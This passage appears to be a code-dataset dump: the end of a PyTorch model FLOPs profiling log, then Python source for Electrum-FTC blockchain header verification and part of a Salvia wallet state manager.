0.007 GMac, 0.048% MACs,
(0): Sequential(
0.0 GMac, 0.002% MACs,
(0): AdaptiveAvgPool2d(0.0 GMac, 0.002% MACs, output_size=(1, 1))
(1): Conv2d(0.0 GMac, 0.000% MACs, 512, 128, kernel_size=(1, 1), stride=(1, 1), bias=False)
(2): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(3): ReLU(0.0 GMac, 0.000% MACs, inplace=True)
)
(1): Sequential(
0.001 GMac, 0.004% MACs,
(0): AdaptiveAvgPool2d(0.0 GMac, 0.002% MACs, output_size=(2, 2))
(1): Conv2d(0.0 GMac, 0.002% MACs, 512, 128, kernel_size=(1, 1), stride=(1, 1), bias=False)
(2): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(3): ReLU(0.0 GMac, 0.000% MACs, inplace=True)
)
(2): Sequential(
0.001 GMac, 0.010% MACs,
(0): AdaptiveAvgPool2d(0.0 GMac, 0.002% MACs, output_size=(4, 4))
(1): Conv2d(0.001 GMac, 0.008% MACs, 512, 128, kernel_size=(1, 1), stride=(1, 1), bias=False)
(2): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(3): ReLU(0.0 GMac, 0.000% MACs, inplace=True)
)
(3): Sequential(
0.004 GMac, 0.033% MACs,
(0): AdaptiveAvgPool2d(0.0 GMac, 0.002% MACs, output_size=(8, 8))
(1): Conv2d(0.004 GMac, 0.030% MACs, 512, 128, kernel_size=(1, 1), stride=(1, 1), bias=False)
(2): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(3): ReLU(0.0 GMac, 0.000% MACs, inplace=True)
)
)
(bottleneck): Conv2d(2.416 GMac, 17.551% MACs, 1024, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn): BatchNorm2d(0.001 GMac, 0.004% MACs, 512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.0 GMac, 0.002% MACs, inplace=True)
)
(wc3): Sequential(
0.01 GMac, 0.076% MACs,
(0): Conv2d(0.01 GMac, 0.072% MACs, 64, 19, kernel_size=(1, 1), stride=(1, 1), bias=False)
(1): BatchNorm2d(0.0 GMac, 0.002% MACs, 19, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(0.0 GMac, 0.001% MACs, inplace=True)
)
(wc4): Sequential(
0.009 GMac, 0.062% MACs,
(0): Conv2d(0.008 GMac, 0.061% MACs, 128, 32, kernel_size=(1, 1), stride=(1, 1), bias=False)
(1): BatchNorm2d(0.0 GMac, 0.001% MACs, 32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(0.0 GMac, 0.000% MACs, inplace=True)
)
(wc5): Sequential(
0.034 GMac, 0.245% MACs,
(0): Conv2d(0.034 GMac, 0.244% MACs, 512, 128, kernel_size=(1, 1), stride=(1, 1), bias=False)
(1): BatchNorm2d(0.0 GMac, 0.001% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(0.0 GMac, 0.000% MACs, inplace=True)
)
(dec4): FuseBlock(
0.04 GMac, 0.293% MACs,
(conv1): Conv2d(0.002 GMac, 0.015% MACs, 128, 32, kernel_size=(1, 1), stride=(1, 1), bias=False)
(bn1): BatchNorm2d(0.0 GMac, 0.000% MACs, 32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.0 GMac, 0.001% MACs, inplace=True)
(dconv): ConvTranspose2d(0.0 GMac, 0.002% MACs, 32, 32, kernel_size=(4, 4), stride=(2, 2), padding=(1, 1), groups=32, bias=False)
(conv2): Conv2d(0.038 GMac, 0.274% MACs, 64, 32, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.0 GMac, 0.001% MACs, 32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(dec3): FuseBlock(
0.056 GMac, 0.405% MACs,
(conv1): Conv2d(0.001 GMac, 0.009% MACs, 32, 19, kernel_size=(1, 1), stride=(1, 1), bias=False)
(bn1): BatchNorm2d(0.0 GMac, 0.001% MACs, 19, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.0 GMac, 0.001% MACs, inplace=True)
(dconv): ConvTranspose2d(0.001 GMac, 0.005% MACs, 19, 19, kernel_size=(4, 4), stride=(2, 2), padding=(1, 1), groups=19, bias=False)
(conv2): Conv2d(0.053 GMac, 0.387% MACs, 38, 19, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.0 GMac, 0.002% MACs, 19, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(score): Sequential(
0.027 GMac, 0.197% MACs,
(0): Conv2d(0.027 GMac, 0.193% MACs, 19, 19, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(1): BatchNorm2d(0.0 GMac, 0.002% MACs, 19, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(0.0 GMac, 0.001% MACs, inplace=True)
)
(score_u8): ConvTranspose2d(0.04 GMac, 0.289% MACs, 19, 19, kernel_size=(16, 16), stride=(8, 8), padding=(4, 4), groups=19, bias=False)
)
[INFO] Register count_convNd() for <class 'torch.nn.modules.conv.Conv2d'>.
[INFO] Register count_bn() for <class 'torch.nn.modules.batchnorm.BatchNorm2d'>.
[INFO] Register zero_ops() for <class 'torch.nn.modules.activation.ReLU'>.
[WARN] Cannot find rule for <class 'torch.nn.modules.container.Sequential'>. Treat it as zero Macs and zero Params.
[WARN] Cannot find rule for <class '__main__.ResBlock'>. Treat it as zero Macs and zero Params.
[INFO] Register count_adap_avgpool() for <class 'torch.nn.modules.pooling.AdaptiveAvgPool2d'>.
[WARN] Cannot find rule for <class 'torch.nn.modules.container.ModuleList'>. Treat it as zero Macs and zero Params.
[WARN] Cannot find rule for <class '__main__.PSPModule'>. Treat it as zero Macs and zero Params.
[INFO] Register count_convNd() for <class 'torch.nn.modules.conv.ConvTranspose2d'>.
[WARN] Cannot find rule for <class '__main__.FuseBlock'>. Treat it as zero Macs and zero Params.
[WARN] Cannot find rule for <class '__main__.DF1SegX11'>. Treat it as zero Macs and zero Params.
defaultdict(<class 'float'>, {'conv': 32.417824768, 'batchnorm': 0.18514432})
13765265280.0 18756722
32512581120.0 13479154.0
Process finished with exit code 0
'''
| 56.829847 | 319 | 0.543206 |
6fadf40ca22ddda121c1109e8ec358c31fb3506f
| 18,443 |
py
|
Python
|
lib/blockchain.py
|
quietnan/electrum-ftc
|
5f72cadd777d80a7235e4860589c425287a67fe9
|
[
"MIT"
] | null | null | null |
lib/blockchain.py
|
quietnan/electrum-ftc
|
5f72cadd777d80a7235e4860589c425287a67fe9
|
[
"MIT"
] | null | null | null |
lib/blockchain.py
|
quietnan/electrum-ftc
|
5f72cadd777d80a7235e4860589c425287a67fe9
|
[
"MIT"
] | null | null | null |
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 [email protected]
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import threading
from . import util
from . import bitcoin
from . import constants
from .bitcoin import *
MAX_TARGET = 0x00000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
MAX_TARGET_NEOSCRYPT = 0x0000003FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
SEVEN_DAYS = 7 * 24 * 60 * 60
HEIGHT_FORK_ONE = 33000
HEIGHT_FORK_TWO = 87948
HEIGHT_FORK_THREE = 204639
HEIGHT_FORK_FOUR = 432000
def serialize_header(res):
s = int_to_hex(res.get('version'), 4) \
+ rev_hex(res.get('prev_block_hash')) \
+ rev_hex(res.get('merkle_root')) \
+ int_to_hex(int(res.get('timestamp')), 4) \
+ int_to_hex(int(res.get('bits')), 4) \
+ int_to_hex(int(res.get('nonce')), 4)
return s
def deserialize_header(s, height):
if not s:
raise Exception('Invalid header: {}'.format(s))
if len(s) != 80:
raise Exception('Invalid header length: {}'.format(len(s)))
hex_to_int = lambda s: int('0x' + bh2u(s[::-1]), 16)
h = {}
h['version'] = hex_to_int(s[0:4])
h['prev_block_hash'] = hash_encode(s[4:36])
h['merkle_root'] = hash_encode(s[36:68])
h['timestamp'] = hex_to_int(s[68:72])
h['bits'] = hex_to_int(s[72:76])
h['nonce'] = hex_to_int(s[76:80])
h['block_height'] = height
return h
def pow_hash_header(header):
if header is None:
return '0' * 64
if header.get('prev_block_hash') is None:
header['prev_block_hash'] = '00'*32
hashAlg = PoWNeoScryptHash
if header.get('timestamp') < 1414346265:
hashAlg = PoWHash
return hash_encode(hashAlg(bfh(serialize_header(header))))
def hash_header(header):
if header is None:
return '0' * 64
if header.get('prev_block_hash') is None:
header['prev_block_hash'] = '00'*32
return hash_encode(Hash(bfh(serialize_header(header))))
blockchains = {}
def read_blockchains(config):
blockchains[0] = Blockchain(config, 0, None)
fdir = os.path.join(util.get_headers_dir(config), 'forks')
if not os.path.exists(fdir):
os.mkdir(fdir)
l = filter(lambda x: x.startswith('fork_'), os.listdir(fdir))
l = sorted(l, key = lambda x: int(x.split('_')[1]))
for filename in l:
checkpoint = int(filename.split('_')[2])
parent_id = int(filename.split('_')[1])
b = Blockchain(config, checkpoint, parent_id)
h = b.read_header(b.checkpoint)
if b.parent().can_connect(h, check_height=False):
blockchains[b.checkpoint] = b
else:
util.print_error("cannot connect", filename)
return blockchains
def check_header(header):
if type(header) is not dict:
return False
for b in blockchains.values():
if b.check_header(header):
return b
return False
def can_connect(header):
for b in blockchains.values():
if b.can_connect(header):
return b
return False
class Blockchain(util.PrintError):
"""
Manages blockchain headers and their verification
"""
def __init__(self, config, checkpoint, parent_id):
self.config = config
self.catch_up = None # interface catching up
self.checkpoint = checkpoint
self.checkpoints = constants.net.CHECKPOINTS
self.target_bridge = constants.read_json('target_bridge.json', None)
self.parent_id = parent_id
self.lock = threading.Lock()
with self.lock:
self.update_size()
def parent(self):
return blockchains[self.parent_id]
def get_max_child(self):
children = list(filter(lambda y: y.parent_id==self.checkpoint, blockchains.values()))
return max([x.checkpoint for x in children]) if children else None
def get_checkpoint(self):
mc = self.get_max_child()
return mc if mc is not None else self.checkpoint
def get_branch_size(self):
return self.height() - self.get_checkpoint() + 1
def get_name(self):
return self.get_hash(self.get_checkpoint()).lstrip('00')[0:10]
def check_header(self, header):
header_hash = hash_header(header)
height = header.get('block_height')
return header_hash == self.get_hash(height)
def fork(parent, header):
checkpoint = header.get('block_height')
self = Blockchain(parent.config, checkpoint, parent.checkpoint)
open(self.path(), 'w+').close()
self.save_header(header)
return self
def height(self):
return self.checkpoint + self.size() - 1
def size(self):
with self.lock:
return self._size
def update_size(self):
p = self.path()
self._size = os.path.getsize(p)//80 if os.path.exists(p) else 0
def verify_header(self, header, prev_hash, target):
_hash = pow_hash_header(header)
if prev_hash != header.get('prev_block_hash'):
raise Exception("prev hash mismatch: %s vs %s" % (prev_hash, header.get('prev_block_hash')))
if constants.net.TESTNET:
return
if header.get('block_height') >= len(self.checkpoints) * 2016:
bits = self.target_to_bits(target)
if bits != header.get('bits'):
raise Exception("bits mismatch: %s vs %s" % (bits, header.get('bits')))
if int('0x' + _hash, 16) > target:
raise Exception("insufficient proof of work: %s vs target %s" % (int('0x' + _hash, 16), target))
def verify_chunk(self, index, data):
num = len(data) // 80
prev_hash = self.get_hash(index * 2016 - 1)
headers = []
for i in range(num):
raw_header = data[i*80:(i+1) * 80]
headers.append(deserialize_header(raw_header, index*2016 + i))
for i, header in enumerate(headers):
target = self.get_target(index*2016 + i, headers)
self.verify_header(header, prev_hash, target)
prev_hash = hash_header(header)
def path(self):
d = util.get_headers_dir(self.config)
filename = 'blockchain_headers' if self.parent_id is None else os.path.join('forks', 'fork_%d_%d'%(self.parent_id, self.checkpoint))
return os.path.join(d, filename)
def save_chunk(self, index, chunk):
filename = self.path()
d = (index * 2016 - self.checkpoint) * 80
if d < 0:
chunk = chunk[-d:]
d = 0
truncate = index >= len(self.checkpoints)
self.write(chunk, d, truncate)
self.swap_with_parent()
def swap_with_parent(self):
if self.parent_id is None:
return
parent_branch_size = self.parent().height() - self.checkpoint + 1
if parent_branch_size >= self.size():
return
self.print_error("swap", self.checkpoint, self.parent_id)
parent_id = self.parent_id
checkpoint = self.checkpoint
parent = self.parent()
with open(self.path(), 'rb') as f:
my_data = f.read()
with open(parent.path(), 'rb') as f:
f.seek((checkpoint - parent.checkpoint)*80)
parent_data = f.read(parent_branch_size*80)
self.write(parent_data, 0)
parent.write(my_data, (checkpoint - parent.checkpoint)*80)
# store file path
for b in blockchains.values():
b.old_path = b.path()
# swap parameters
self.parent_id = parent.parent_id; parent.parent_id = parent_id
self.checkpoint = parent.checkpoint; parent.checkpoint = checkpoint
self._size = parent._size; parent._size = parent_branch_size
# move files
for b in blockchains.values():
if b in [self, parent]: continue
if b.old_path != b.path():
self.print_error("renaming", b.old_path, b.path())
os.rename(b.old_path, b.path())
# update pointers
blockchains[self.checkpoint] = self
blockchains[parent.checkpoint] = parent
def write(self, data, offset, truncate=True):
filename = self.path()
with self.lock:
with open(filename, 'rb+') as f:
if truncate and offset != self._size*80:
f.seek(offset)
f.truncate()
f.seek(offset)
f.write(data)
f.flush()
os.fsync(f.fileno())
self.update_size()
def save_header(self, header):
delta = header.get('block_height') - self.checkpoint
data = bfh(serialize_header(header))
assert delta == self.size()
assert len(data) == 80
self.write(data, delta*80)
self.swap_with_parent()
def read_header(self, height):
assert self.parent_id != self.checkpoint
if height < 0:
return
if height < self.checkpoint:
return self.parent().read_header(height)
if height > self.height():
return
delta = height - self.checkpoint
name = self.path()
if os.path.exists(name):
with open(name, 'rb') as f:
f.seek(delta * 80)
h = f.read(80)
if len(h) < 80:
raise Exception('Expected to read a full header. This was only {} bytes'.format(len(h)))
elif not os.path.exists(util.get_headers_dir(self.config)):
raise Exception('Electrum datadir does not exist. Was it deleted while running?')
else:
raise Exception('Cannot find headers file but datadir is there. Should be at {}'.format(name))
if h == bytes([0])*80:
return None
return deserialize_header(h, height)
def get_hash(self, height):
if height == -1:
return '0000000000000000000000000000000000000000000000000000000000000000'
elif height == 0:
return constants.net.GENESIS
elif height < len(self.checkpoints) * 2016:
assert (height+1) % 2016 == 0, height
index = height // 2016
return self.checkpoints[index]
else:
return hash_header(self.read_header(height))
def get_target(self, height, headers):
if constants.net.TESTNET:
return 0
if height == 0:
return MAX_TARGET
if height < len(self.checkpoints) * 2016:
# return pessimistic value to detect if check is unintentionally performed
return 0
bridge_index = height - len(self.checkpoints) * 2016
if bridge_index >= 0 and bridge_index < len(self.target_bridge):
# The block headers are not fetched by default for headers with
# height less than len(self.checkpoints) * 2016. To bridge into
# on-the-fly target computation the target from previous headers
# must be known. Therefore, the necessary target values from local
# storage are used here.
return self.target_bridge[bridge_index]
elif height == HEIGHT_FORK_FOUR:
return MAX_TARGET_NEOSCRYPT
elif height >= HEIGHT_FORK_THREE:
return self.__fork_three_target(height, headers)
elif height >= HEIGHT_FORK_TWO:
return self.__fork_two_target(height, headers)
elif height >= HEIGHT_FORK_ONE:
return self.__fork_one_target(height, headers)
else:
return self.__vanilla_target(height, headers)
@staticmethod
def __damp(nActualTimespan, nTargetTimespan):
return int((nActualTimespan + 3 * nTargetTimespan) / 4)
def __fork_three_target(self, height, headers):
last_height = height - 1
last = self.get_header(last_height, height, headers)
target = self.bits_to_target(last.get('bits'))
first = self.get_header(last_height - 15, height, headers)
nActualTimespanShort = int((last.get('timestamp') - first.get('timestamp')) / 15)
first = self.get_header(last_height - 120, height, headers)
nActualTimespanMedium = int((last.get('timestamp') - first.get('timestamp')) / 120)
first = self.get_header(last_height - 480, height, headers)
nActualTimespanLong = int((last.get('timestamp') - first.get('timestamp')) / 480)
nActualTimespan = (nActualTimespanShort + nActualTimespanMedium + nActualTimespanLong) // 3
nTargetTimespan = 60
nActualTimespan = Blockchain.__damp(nActualTimespan, nTargetTimespan)
return Blockchain.__get_target(target, nActualTimespan, nTargetTimespan, 453, 494)
def __fork_two_target(self, height, headers):
interval = 126
last_height = height - 1
last = self.get_header(last_height, height, headers)
target = self.bits_to_target(last.get('bits'))
if height % interval != 0 and height != HEIGHT_FORK_TWO:
return target
first = self.get_header(last_height - interval, height, headers)
nActualTimespanShort = last.get('timestamp') - first.get('timestamp')
first = self.get_header(last_height - interval * 4, height, headers)
nActualTimespanLong = (last.get('timestamp') - first.get('timestamp')) // 4
nActualTimespan = (nActualTimespanShort + nActualTimespanLong) // 2
nTargetTimespan = SEVEN_DAYS // 32
nActualTimespan = Blockchain.__damp(nActualTimespan, nTargetTimespan)
return Blockchain.__get_target(target, nActualTimespan, nTargetTimespan, 453, 494)
def __fork_one_target(self, height, headers):
interval = 504
last_height = height - 1
last = self.get_header(last_height, height, headers)
target = self.bits_to_target(last.get('bits'))
if height % interval != 0 and height != HEIGHT_FORK_ONE:
return target
first = self.get_header(last_height - interval, height, headers)
nActualTimespan = last.get('timestamp') - first.get('timestamp')
return Blockchain.__get_target(target, nActualTimespan, SEVEN_DAYS // 8, 70, 99)
def __vanilla_target(self, height, headers):
interval = 2016
last_height = height - 1
last = self.get_header(last_height, height, headers)
bits = last.get('bits')
target = self.bits_to_target(bits)
if height % interval != 0:
return target
first = self.get_header(max(0, last_height - interval), height, headers)
nActualTimespan = last.get('timestamp') - first.get('timestamp')
return Blockchain.__get_target(target, nActualTimespan, SEVEN_DAYS // 2, 1, 4)
@staticmethod
def __get_target(target, nActualTimespan, nTargetTimespan, numerator, denominator):
nActualTimespan = max(nActualTimespan, int(nTargetTimespan * numerator / denominator))
nActualTimespan = min(nActualTimespan, int(nTargetTimespan * denominator / numerator))
new_target = min(MAX_TARGET, int(target * nActualTimespan / nTargetTimespan))
return new_target
def get_header(self, height, ref_height, headers):
delta = ref_height % 2016
if height < ref_height - delta or headers is None:
return self.read_header(height)
return headers[delta - (ref_height - height)]
def bits_to_target(self, bits):
bitsN = (bits >> 24) & 0xff
if not (bitsN >= 0x03 and bitsN <= 0x1e):
raise Exception("First part of bits should be in [0x03, 0x1e]")
bitsBase = bits & 0xffffff
if not (bitsBase >= 0x8000 and bitsBase <= 0x7fffff):
raise Exception("Second part of bits should be in [0x8000, 0x7fffff]")
return bitsBase << (8 * (bitsN-3))
def target_to_bits(self, target):
c = ("%064x" % target)[2:]
while c[:2] == '00' and len(c) > 6:
c = c[2:]
bitsN, bitsBase = len(c) // 2, int('0x' + c[:6], 16)
if bitsBase >= 0x800000:
bitsN += 1
bitsBase >>= 8
return bitsN << 24 | bitsBase
def can_connect(self, header, check_height=True):
if header is None:
return False
height = header['block_height']
if check_height and self.height() != height - 1:
#self.print_error("cannot connect at height", height)
return False
if height == 0:
return hash_header(header) == constants.net.GENESIS
try:
prev_hash = self.get_hash(height - 1)
except:
return False
if prev_hash != header.get('prev_block_hash'):
return False
target = self.get_target(height, None)
try:
self.verify_header(header, prev_hash, target)
except BaseException as e:
return False
return True
def connect_chunk(self, idx, hexdata):
try:
data = bfh(hexdata)
self.verify_chunk(idx, data)
#self.print_error("validated chunk %d" % idx)
self.save_chunk(idx, data)
return True
except BaseException as e:
self.print_error('verify_chunk %d failed'%idx, str(e))
return False
def get_checkpoints(self):
# for each chunk, store the hash of the last block and the target after the chunk
n = self.height() // 2016
return [self.get_hash((i+1) * 2016 -1) for i in range(n)]
| 40.180828 | 140 | 0.626091 |
4cf50e7ee87edb0a771dd0ba8b4947406c912d59
| 54,440 |
py
|
Python
|
salvia/wallet/wallet_state_manager.py
|
mikando/salvia-blockchain
|
02181d0b5a063374f01eea951570dbc661bddc34
|
[
"Apache-2.0"
] | null | null | null |
salvia/wallet/wallet_state_manager.py
|
mikando/salvia-blockchain
|
02181d0b5a063374f01eea951570dbc661bddc34
|
[
"Apache-2.0"
] | null | null | null |
salvia/wallet/wallet_state_manager.py
|
mikando/salvia-blockchain
|
02181d0b5a063374f01eea951570dbc661bddc34
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import base64
import json
import logging
import time
from collections import defaultdict
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Tuple
import aiosqlite
from blspy import AugSchemeMPL, G1Element, PrivateKey
from chiabip158 import PyBIP158
from cryptography.fernet import Fernet
from salvia import __version__
from salvia.consensus.block_record import BlockRecord
from salvia.consensus.coinbase import pool_parent_id, farmer_parent_id
from salvia.consensus.constants import ConsensusConstants
from salvia.consensus.find_fork_point import find_fork_point_in_chain
from salvia.full_node.weight_proof import WeightProofHandler
from salvia.pools.pool_puzzles import SINGLETON_LAUNCHER_HASH, solution_to_pool_state
from salvia.pools.pool_wallet import PoolWallet
from salvia.protocols.wallet_protocol import PuzzleSolutionResponse, RespondPuzzleSolution
from salvia.types.blockchain_format.coin import Coin
from salvia.types.blockchain_format.program import Program
from salvia.types.blockchain_format.sized_bytes import bytes32
from salvia.types.coin_spend import CoinSpend
from salvia.types.full_block import FullBlock
from salvia.types.header_block import HeaderBlock
from salvia.types.mempool_inclusion_status import MempoolInclusionStatus
from salvia.util.byte_types import hexstr_to_bytes
from salvia.util.db_wrapper import DBWrapper
from salvia.util.errors import Err
from salvia.util.hash import std_hash
from salvia.util.ints import uint32, uint64, uint128
from salvia.util.db_synchronous import db_synchronous_on
from salvia.wallet.block_record import HeaderBlockRecord
from salvia.wallet.cc_wallet.cc_wallet import CCWallet
from salvia.wallet.derivation_record import DerivationRecord
from salvia.wallet.derive_keys import master_sk_to_backup_sk, master_sk_to_wallet_sk
from salvia.wallet.key_val_store import KeyValStore
from salvia.wallet.rl_wallet.rl_wallet import RLWallet
from salvia.wallet.settings.user_settings import UserSettings
from salvia.wallet.trade_manager import TradeManager
from salvia.wallet.transaction_record import TransactionRecord
from salvia.wallet.util.backup_utils import open_backup_file
from salvia.wallet.util.transaction_type import TransactionType
from salvia.wallet.util.wallet_types import WalletType
from salvia.wallet.wallet import Wallet
from salvia.wallet.wallet_action import WalletAction
from salvia.wallet.wallet_action_store import WalletActionStore
from salvia.wallet.wallet_block_store import WalletBlockStore
from salvia.wallet.wallet_blockchain import WalletBlockchain
from salvia.wallet.wallet_coin_record import WalletCoinRecord
from salvia.wallet.wallet_coin_store import WalletCoinStore
from salvia.wallet.wallet_info import WalletInfo, WalletInfoBackup
from salvia.wallet.wallet_interested_store import WalletInterestedStore
from salvia.wallet.wallet_pool_store import WalletPoolStore
from salvia.wallet.wallet_puzzle_store import WalletPuzzleStore
from salvia.wallet.wallet_sync_store import WalletSyncStore
from salvia.wallet.wallet_transaction_store import WalletTransactionStore
from salvia.wallet.wallet_user_store import WalletUserStore
from salvia.server.server import SalviaServer
from salvia.wallet.did_wallet.did_wallet import DIDWallet
def get_balance_from_coin_records(coin_records: Set[WalletCoinRecord]) -> uint128:
amount: uint128 = uint128(0)
for record in coin_records:
amount = uint128(amount + record.coin.amount)
return uint128(amount)
class WalletStateManager:
constants: ConsensusConstants
config: Dict
tx_store: WalletTransactionStore
puzzle_store: WalletPuzzleStore
user_store: WalletUserStore
action_store: WalletActionStore
basic_store: KeyValStore
start_index: int
# Makes sure only one asyncio thread is changing the blockchain state at one time
lock: asyncio.Lock
tx_lock: asyncio.Lock
log: logging.Logger
# TODO Don't allow user to send tx until wallet is synced
sync_mode: bool
genesis: FullBlock
state_changed_callback: Optional[Callable]
pending_tx_callback: Optional[Callable]
puzzle_hash_created_callbacks: Dict = defaultdict(lambda *x: None)
new_peak_callbacks: Dict = defaultdict(lambda *x: None)
db_path: Path
db_connection: aiosqlite.Connection
db_wrapper: DBWrapper
main_wallet: Wallet
wallets: Dict[uint32, Any]
private_key: PrivateKey
trade_manager: TradeManager
new_wallet: bool
user_settings: UserSettings
blockchain: Any
block_store: WalletBlockStore
coin_store: WalletCoinStore
sync_store: WalletSyncStore
interested_store: WalletInterestedStore
pool_store: WalletPoolStore
weight_proof_handler: Any
server: SalviaServer
root_path: Path
@staticmethod
async def create(
private_key: PrivateKey,
config: Dict,
db_path: Path,
constants: ConsensusConstants,
server: SalviaServer,
root_path: Path,
name: str = None,
):
self = WalletStateManager()
self.new_wallet = False
self.config = config
self.constants = constants
self.server = server
self.root_path = root_path
self.log = logging.getLogger(name if name else __name__)
self.lock = asyncio.Lock()
self.log.debug(f"Starting in db path: {db_path}")
self.db_connection = await aiosqlite.connect(db_path)
await self.db_connection.execute("pragma journal_mode=wal")
await self.db_connection.execute(
"pragma synchronous={}".format(db_synchronous_on(self.config.get("db_sync", "auto"), db_path))
)
self.db_wrapper = DBWrapper(self.db_connection)
self.coin_store = await WalletCoinStore.create(self.db_wrapper)
self.tx_store = await WalletTransactionStore.create(self.db_wrapper)
self.puzzle_store = await WalletPuzzleStore.create(self.db_wrapper)
self.user_store = await WalletUserStore.create(self.db_wrapper)
self.action_store = await WalletActionStore.create(self.db_wrapper)
self.basic_store = await KeyValStore.create(self.db_wrapper)
self.trade_manager = await TradeManager.create(self, self.db_wrapper)
self.user_settings = await UserSettings.create(self.basic_store)
self.block_store = await WalletBlockStore.create(self.db_wrapper)
self.interested_store = await WalletInterestedStore.create(self.db_wrapper)
self.pool_store = await WalletPoolStore.create(self.db_wrapper)
self.blockchain = await WalletBlockchain.create(
self.block_store,
self.coin_store,
self.tx_store,
self.pool_store,
self.constants,
self.new_transaction_block_callback,
self.reorg_rollback,
self.lock,
)
self.weight_proof_handler = WeightProofHandler(self.constants, self.blockchain)
self.sync_mode = False
self.sync_store = await WalletSyncStore.create()
self.state_changed_callback = None
self.pending_tx_callback = None
self.db_path = db_path
main_wallet_info = await self.user_store.get_wallet_by_id(1)
assert main_wallet_info is not None
self.private_key = private_key
self.main_wallet = await Wallet.create(self, main_wallet_info)
self.wallets = {main_wallet_info.id: self.main_wallet}
wallet = None
for wallet_info in await self.get_all_wallet_info_entries():
if wallet_info.type == WalletType.STANDARD_WALLET:
if wallet_info.id == 1:
continue
wallet = await Wallet.create(config, wallet_info)
elif wallet_info.type == WalletType.COLOURED_COIN:
wallet = await CCWallet.create(
self,
self.main_wallet,
wallet_info,
)
elif wallet_info.type == WalletType.RATE_LIMITED:
wallet = await RLWallet.create(self, wallet_info)
elif wallet_info.type == WalletType.DISTRIBUTED_ID:
wallet = await DIDWallet.create(
self,
self.main_wallet,
wallet_info,
)
elif wallet_info.type == WalletType.POOLING_WALLET:
wallet = await PoolWallet.create_from_db(
self,
self.main_wallet,
wallet_info,
)
if wallet is not None:
self.wallets[wallet_info.id] = wallet
async with self.puzzle_store.lock:
index = await self.puzzle_store.get_last_derivation_path()
if index is None or index < self.config["initial_num_public_keys"] - 1:
await self.create_more_puzzle_hashes(from_zero=True)
return self
@property
def peak(self) -> Optional[BlockRecord]:
peak = self.blockchain.get_peak()
return peak
def get_derivation_index(self, pubkey: G1Element, max_depth: int = 1000) -> int:
for i in range(0, max_depth):
derived = self.get_public_key(uint32(i))
if derived == pubkey:
return i
return -1
def get_public_key(self, index: uint32) -> G1Element:
return master_sk_to_wallet_sk(self.private_key, index).get_g1()
async def load_wallets(self):
for wallet_info in await self.get_all_wallet_info_entries():
if wallet_info.id in self.wallets:
continue
if wallet_info.type == WalletType.STANDARD_WALLET:
if wallet_info.id == 1:
continue
wallet = await Wallet.create(self.config, wallet_info)
self.wallets[wallet_info.id] = wallet
# TODO add RL AND DiD WALLETS HERE
elif wallet_info.type == WalletType.COLOURED_COIN:
wallet = await CCWallet.create(
self,
self.main_wallet,
wallet_info,
)
self.wallets[wallet_info.id] = wallet
elif wallet_info.type == WalletType.DISTRIBUTED_ID:
wallet = await DIDWallet.create(
self,
self.main_wallet,
wallet_info,
)
self.wallets[wallet_info.id] = wallet
async def get_keys(self, puzzle_hash: bytes32) -> Optional[Tuple[G1Element, PrivateKey]]:
index_for_puzzlehash = await self.puzzle_store.index_for_puzzle_hash(puzzle_hash)
if index_for_puzzlehash is None:
raise ValueError(f"No key for this puzzlehash {puzzle_hash})")
private = master_sk_to_wallet_sk(self.private_key, index_for_puzzlehash)
pubkey = private.get_g1()
return pubkey, private
async def create_more_puzzle_hashes(self, from_zero: bool = False, in_transaction=False):
"""
For all wallets in the user store, generates the first few puzzle hashes so
that we can restore the wallet from only the private keys.
"""
targets = list(self.wallets.keys())
unused: Optional[uint32] = await self.puzzle_store.get_unused_derivation_path()
if unused is None:
# This handles the case where the database has entries but they have all been used
unused = await self.puzzle_store.get_last_derivation_path()
if unused is None:
# This handles the case where the database is empty
unused = uint32(0)
if self.new_wallet:
to_generate = self.config["initial_num_public_keys_new_wallet"]
else:
